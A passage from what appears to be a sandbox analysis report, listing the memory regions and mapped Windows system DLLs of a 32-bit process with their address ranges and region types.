0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 528 start_va = 0x743f0000 end_va = 0x74402fff entry_point = 0x743f0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 529 start_va = 0x74670000 end_va = 0x74676fff entry_point = 0x74670000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 530 start_va = 0x74680000 end_va = 0x7469bfff entry_point = 0x74680000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 531 start_va = 0x746a0000 end_va = 0x746aafff entry_point = 0x746a0000 region_type = mapped_file name = "traffic.dll" filename = "\\Windows\\SysWOW64\\traffic.dll" (normalized: "c:\\windows\\syswow64\\traffic.dll") Region: id = 532 start_va = 0x746b0000 end_va = 0x746bcfff entry_point = 0x746b0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 533 start_va = 0x746c0000 end_va = 0x746fbfff entry_point = 0x746c0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 534 start_va = 0x74700000 end_va = 0x74705fff entry_point = 0x74700000 region_type = mapped_file name = "dciman32.dll" filename = "\\Windows\\SysWOW64\\dciman32.dll" (normalized: "c:\\windows\\syswow64\\dciman32.dll") Region: id = 535 start_va = 0x74710000 end_va = 0x747f6fff entry_point = 0x74710000 region_type = mapped_file name = "ddraw.dll" filename = "\\Windows\\SysWOW64\\ddraw.dll" (normalized: "c:\\windows\\syswow64\\ddraw.dll") Region: id = 536 start_va = 0x74800000 end_va = 0x74821fff entry_point = 0x74800000 region_type = mapped_file name = "glu32.dll" filename = "\\Windows\\SysWOW64\\glu32.dll" (normalized: "c:\\windows\\syswow64\\glu32.dll") Region: id = 537 start_va = 0x74830000 end_va = 0x748f7fff entry_point = 0x74830000 region_type = mapped_file name = "opengl32.dll" filename = "\\Windows\\SysWOW64\\opengl32.dll" (normalized: "c:\\windows\\syswow64\\opengl32.dll") Region: id = 538 start_va = 0x74900000 end_va = 0x7493bfff entry_point = 0x74900000 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\SysWOW64\\pdh.dll" (normalized: "c:\\windows\\syswow64\\pdh.dll") Region: id = 539 start_va = 0x74940000 end_va = 0x74971fff entry_point = 0x74940000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 540 start_va = 0x74980000 end_va = 0x74993fff entry_point = 0x74980000 region_type = mapped_file name = "msacm32.dll" filename = "\\Windows\\SysWOW64\\msacm32.dll" (normalized: "c:\\windows\\syswow64\\msacm32.dll") Region: id = 541 start_va = 0x749a0000 end_va = 0x749b1fff entry_point = 0x749a0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 542 start_va = 0x74ac0000 end_va = 0x74acbfff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 543 start_va = 0x74ad0000 end_va = 0x74b2ffff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 544 start_va = 0x74b30000 end_va = 0x74b8ffff entry_point = 0x74b30000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 545 start_va = 0x74ca0000 end_va = 0x74d9ffff entry_point = 0x74ca0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 546 start_va = 0x74da0000 end_va = 0x74da9fff entry_point = 0x74da0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 547 start_va = 0x74db0000 end_va = 0x74e7bfff entry_point = 0x74db0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 548 start_va = 0x74e80000 end_va = 0x74e98fff entry_point = 0x74e80000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 549 start_va = 0x74ea0000 end_va = 0x74f3ffff entry_point = 0x74ea0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 550 start_va = 0x75ee0000 end_va = 0x75fcffff entry_point = 0x75ee0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 551 start_va = 0x75fd0000 end_va = 0x75fd5fff entry_point = 0x75fd0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 552 start_va = 0x75fe0000 end_va = 0x7606efff entry_point = 0x75fe0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 553 start_va = 0x762d0000 end_va = 0x762e1fff entry_point = 0x762d0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 554 start_va = 0x762f0000 end_va = 0x76324fff entry_point = 0x762f0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 555 start_va = 0x763c0000 end_va = 0x763e6fff entry_point = 0x763c0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 556 start_va = 0x763f0000 end_va = 0x7647ffff entry_point = 0x763f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 557 start_va = 0x76510000 end_va = 0x765acfff entry_point = 0x76510000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 558 start_va = 0x76710000 end_va = 0x7686bfff entry_point = 0x76710000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 559 start_va = 0x768a0000 end_va = 0x76a3cfff entry_point = 0x768a0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 560 start_va = 0x76a40000 end_va = 0x76aebfff entry_point = 0x76a40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 561 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 562 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 563 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 564 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 565 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 566 start_va = 0x230000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 567 start_va = 0x2b0000 end_va = 0x2b6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 568 start_va = 0x2c0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 569 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x2d0000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 570 start_va = 0x2e0000 end_va = 0x2e1fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 571 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 572 start_va = 0x300000 end_va = 0x300fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 573 start_va = 0x3d0000 end_va = 0x557fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 574 start_va = 0x670000 end_va = 0x7f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 575 start_va = 0x800000 end_va = 0x1bfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 576 start_va = 0x1cb0000 end_va = 0x1ceffff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 577 start_va = 0x1cf0000 end_va = 0x20e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cf0000" filename = "" Region: id = 578 start_va = 0x2210000 end_va = 0x221ffff entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 579 start_va = 0x7ef50000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007ef50000" filename = "" Region: id = 580 start_va = 0x74410000 end_va = 0x7448ffff entry_point = 0x74410000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 581 start_va = 0x20f0000 end_va = 0x21bffff entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 582 start_va = 0x2220000 end_va = 0x22fefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002220000" filename = "" Region: id = 583 start_va = 0x74660000 end_va = 0x74667fff entry_point = 0x74660000 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\SysWOW64\\drprov.dll" (normalized: "c:\\windows\\syswow64\\drprov.dll") Region: id = 584 start_va = 0x74630000 end_va = 0x74658fff entry_point = 0x74630000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 585 start_va = 0x74610000 end_va = 0x74623fff entry_point = 0x74610000 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\SysWOW64\\ntlanman.dll" (normalized: "c:\\windows\\syswow64\\ntlanman.dll") Region: id = 586 start_va = 0x745f0000 end_va = 0x74606fff entry_point = 0x745f0000 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 587 start_va = 0x745e0000 end_va = 0x745e7fff entry_point = 0x745e0000 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 588 start_va = 0x310000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 589 start_va = 0x2300000 end_va = 0x23fffff entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 590 start_va = 0x745d0000 end_va = 0x745defff entry_point = 0x745d0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 591 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 592 start_va = 0x1c00000 end_va = 0x1c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 593 start_va = 0x2400000 end_va = 0x24fffff entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 594 start_va = 0x745c0000 end_va = 0x745cafff entry_point = 0x745c0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 595 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 596 start_va = 0x745b0000 end_va = 0x745b8fff entry_point = 0x745b0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 597 start_va = 0x2500000 end_va = 0x25fffff entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 598 start_va = 0x27b0000 end_va = 0x2881fff entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 599 start_va = 0x2890000 end_va = 0x2b5efff entry_point = 0x2890000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 600 start_va = 0x2600000 end_va = 0x26fffff entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 601 start_va = 0x560000 end_va = 0x560fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 602 start_va = 0x560000 end_va = 0x560fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 603 start_va = 0x560000 end_va = 0x560fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 604 start_va = 0x560000 end_va = 0x560fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 605 start_va = 0x560000 end_va = 0x560fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 606 start_va = 0x560000 end_va = 0x560fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 607 start_va = 0x560000 end_va = 0x560fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 608 start_va = 0x560000 end_va = 0x560fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 609 start_va = 0x560000 end_va = 0x560fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 610 start_va = 0x560000 end_va = 0x560fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 611 start_va = 0x560000 end_va = 0x560fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 612 start_va = 0x560000 end_va = 0x560fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 613 start_va = 0x560000 end_va = 0x560fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 614 start_va = 0x560000 end_va = 0x560fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 615 start_va = 0x2b60000 end_va = 0x2c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b60000" filename = "" Region: id = 616 start_va = 0x2c60000 end_va = 0x2e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c60000" filename = "" Region: id = 617 start_va = 0x2e60000 end_va = 0x2fe8fff entry_point = 0x0 region_type = private name = "private_0x0000000002e60000" filename = "" Region: id = 618 start_va = 0x2ff0000 end_va = 0x43f0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ff0000" filename = "" Region: id = 619 start_va = 0x20f0000 end_va = 0x2170fff entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 620 start_va = 0x2180000 end_va = 0x21bffff entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 621 start_va = 0x4400000 end_va = 0x4500fff entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 622 start_va = 0x4510000 end_va = 0x4600fff entry_point = 0x0 region_type = private name = "private_0x0000000004510000" filename = "" Region: id = 623 start_va = 0x2700000 end_va = 0x2790fff entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 624 start_va = 0x4610000 end_va = 0x4720fff entry_point = 0x0 region_type = private name = "private_0x0000000004610000" filename = "" Region: id = 625 start_va = 0x4730000 end_va = 0x48b0fff entry_point = 0x0 region_type = private name = "private_0x0000000004730000" filename = "" Region: id = 626 start_va = 0x48c0000 end_va = 0x49c0fff entry_point = 0x0 region_type = private name = "private_0x00000000048c0000" filename = "" Region: id = 627 start_va = 0x49d0000 end_va = 0x4dcffff entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 628 start_va = 0x74590000 end_va = 0x745a5fff entry_point = 0x74590000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 629 start_va = 0x1c40000 end_va = 0x1c7bfff entry_point = 0x1c40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 630 start_va = 0x1c40000 end_va = 0x1c7bfff entry_point = 0x1c4128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 631 start_va = 0x1c40000 end_va = 0x1c7bfff entry_point = 0x1c4128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 632 start_va = 0x1c40000 end_va = 0x1c7bfff entry_point = 0x1c4128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 633 start_va = 0x1c40000 end_va = 0x1c7bfff entry_point = 0x1c4128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 634 start_va = 0x74550000 end_va = 0x7458afff entry_point = 0x7455128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 635 start_va = 0x4dd0000 end_va = 0x4e45fff entry_point = 0x0 region_type = private name = "private_0x0000000004dd0000" filename = "" Region: id = 636 start_va = 0x760d0000 end_va = 0x761ecfff entry_point = 0x760d0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 637 start_va = 0x76f40000 end_va = 0x76f4bfff entry_point = 0x76f40000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 638 start_va = 0x743a0000 end_va = 0x743e3fff entry_point = 0x743a0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 639 start_va = 0x4e50000 end_va = 0x506ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e50000" filename = "" Region: id = 640 start_va = 0x74c90000 end_va = 0x74c94fff entry_point = 0x74c90000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 641 start_va = 0x74f40000 end_va = 0x75b89fff entry_point = 0x74f40000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 642 start_va = 0x76070000 end_va = 0x760c6fff entry_point = 0x76070000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 643 start_va = 0x74340000 end_va = 0x74397fff entry_point = 0x74340000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 644 start_va = 0x742f0000 end_va = 0x7433efff entry_point = 0x742f0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 645 start_va = 0x74160000 end_va = 0x742effff entry_point = 0x74160000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 646 start_va = 0x74140000 end_va = 0x74150fff entry_point = 0x74140000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 647 start_va = 0x74120000 end_va = 0x74138fff entry_point = 0x74120000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 648 start_va = 0x560000 end_va = 0x560fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 649 start_va = 0x4e50000 end_va = 0x4ec5fff entry_point = 0x0 region_type = private name = "private_0x0000000004e50000" filename = "" Region: id = 650 start_va = 0x5030000 end_va = 0x506ffff entry_point = 0x0 region_type = private name = "private_0x0000000005030000" filename = "" Region: id = 651 start_va = 0x1c40000 end_va = 0x1c40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c40000" filename = "" Region: id = 652 start_va = 0x1c50000 end_va = 0x1c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 653 start_va = 0x1c90000 end_va = 0x1c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 654 start_va = 0x4ed0000 end_va = 0x4fcffff entry_point = 0x0 region_type = private name = "private_0x0000000004ed0000" filename = "" Region: id = 655 start_va = 0x7ef4d000 end_va = 0x7ef4ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef4d000" filename = "" Region: id = 656 start_va = 0x21c0000 end_va = 0x21fffff entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 657 start_va = 0x5070000 end_va = 0x516ffff entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 658 start_va = 0x740e0000 end_va = 0x7411bfff entry_point = 0x740e0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 659 start_va = 0x7ef4a000 end_va = 0x7ef4cfff entry_point = 0x0 region_type = private name = "private_0x000000007ef4a000" filename = "" Region: id = 660 start_va = 0x4fd0000 end_va = 0x501ffff entry_point = 0x0 region_type = private name = "private_0x0000000004fd0000" filename = "" Region: id = 661 start_va = 0x740d0000 end_va = 0x740d4fff entry_point = 0x740d0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 662 start_va = 0x5170000 end_va = 0x51affff entry_point = 0x0 region_type = private name = "private_0x0000000005170000" filename = "" Region: id = 663 start_va = 0x51b0000 end_va = 0x52affff entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 664 start_va = 0x52b0000 end_va = 0x52effff entry_point = 0x0 region_type = private name = "private_0x00000000052b0000" filename = "" Region: id = 665 start_va = 0x52f0000 end_va = 0x53effff entry_point = 0x0 region_type = private name = "private_0x00000000052f0000" filename = "" Region: id = 666 start_va = 0x7ef44000 end_va = 0x7ef46fff entry_point = 0x0 region_type = private name = "private_0x000000007ef44000" filename = "" Region: id = 667 start_va = 0x7ef47000 end_va = 0x7ef49fff entry_point = 0x0 region_type = private name = "private_0x000000007ef47000" filename = "" Region: id = 668 start_va = 0x53f0000 end_va = 0x542ffff entry_point = 0x0 region_type = private name = "private_0x00000000053f0000" filename = "" Region: id = 669 start_va = 0x5430000 end_va = 0x552ffff entry_point = 0x0 region_type = private name = "private_0x0000000005430000" filename = "" Region: id = 670 start_va = 0x5530000 end_va = 0x55effff entry_point = 0x5530000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 671 start_va = 0x7ef41000 end_va = 0x7ef43fff entry_point = 0x0 region_type = private name = "private_0x000000007ef41000" filename = "" Region: id = 672 start_va = 0x740c0000 end_va = 0x740c7fff entry_point = 0x740c0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 673 start_va = 0x740b0000 end_va = 0x740b5fff entry_point = 0x740b0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 674 start_va = 0x55f0000 end_va = 0x562ffff entry_point = 0x0 region_type = private name = "private_0x00000000055f0000" filename = "" Region: id = 675 start_va = 0x5630000 end_va = 0x572ffff entry_point = 0x0 region_type = private name = "private_0x0000000005630000" filename = "" Region: id = 676 start_va = 0x740a0000 end_va = 0x740a5fff entry_point = 0x740a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 677 start_va = 0x7ef3e000 end_va = 0x7ef40fff entry_point = 0x0 region_type = private name = "private_0x000000007ef3e000" filename = "" Region: id = 678 start_va = 0x74060000 end_va = 0x74097fff entry_point = 0x74060000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 679 start_va = 0x58c0000 end_va = 0x58fffff entry_point = 0x0 region_type = private name = "private_0x00000000058c0000" filename = "" Region: id = 680 start_va = 0x5730000 end_va = 0x576ffff entry_point = 0x0 region_type = private name = "private_0x0000000005730000" filename = "" Region: id = 681 start_va = 0x5770000 end_va = 0x586ffff entry_point = 0x0 region_type = private name = "private_0x0000000005770000" filename = "" Region: id = 682 start_va = 0x7ef3b000 end_va = 0x7ef3dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef3b000" filename = "" Region: id = 683 start_va = 0x1c90000 end_va = 0x1c98fff entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 684 start_va = 0x5870000 end_va = 0x58affff entry_point = 0x0 region_type = private name = "private_0x0000000005870000" filename = "" Region: id = 685 start_va = 0x5900000 end_va = 0x59fffff entry_point = 0x0 region_type = private name = "private_0x0000000005900000" filename = "" Region: id = 686 start_va = 0x7ef38000 end_va = 0x7ef3afff entry_point = 0x0 region_type = private name = "private_0x000000007ef38000" filename = "" Region: id = 687 start_va = 0x1c90000 end_va = 0x1c99fff entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 688 start_va = 0x5870000 end_va = 0x58affff entry_point = 0x0 region_type = private name = "private_0x0000000005870000" filename = "" Region: id = 689 start_va = 0x5900000 end_va = 0x59fffff entry_point = 0x0 region_type = private name = "private_0x0000000005900000" filename = "" Region: id = 690 start_va = 0x7ef38000 end_va = 0x7ef3afff entry_point = 0x0 region_type = private name = "private_0x000000007ef38000" filename = "" Region: id = 691 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ca0000" filename = "" Region: id = 692 start_va = 0x761f0000 end_va = 0x76272fff entry_point = 0x761f0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 693 start_va = 0x2200000 end_va = 0x2200fff entry_point = 0x0 region_type = 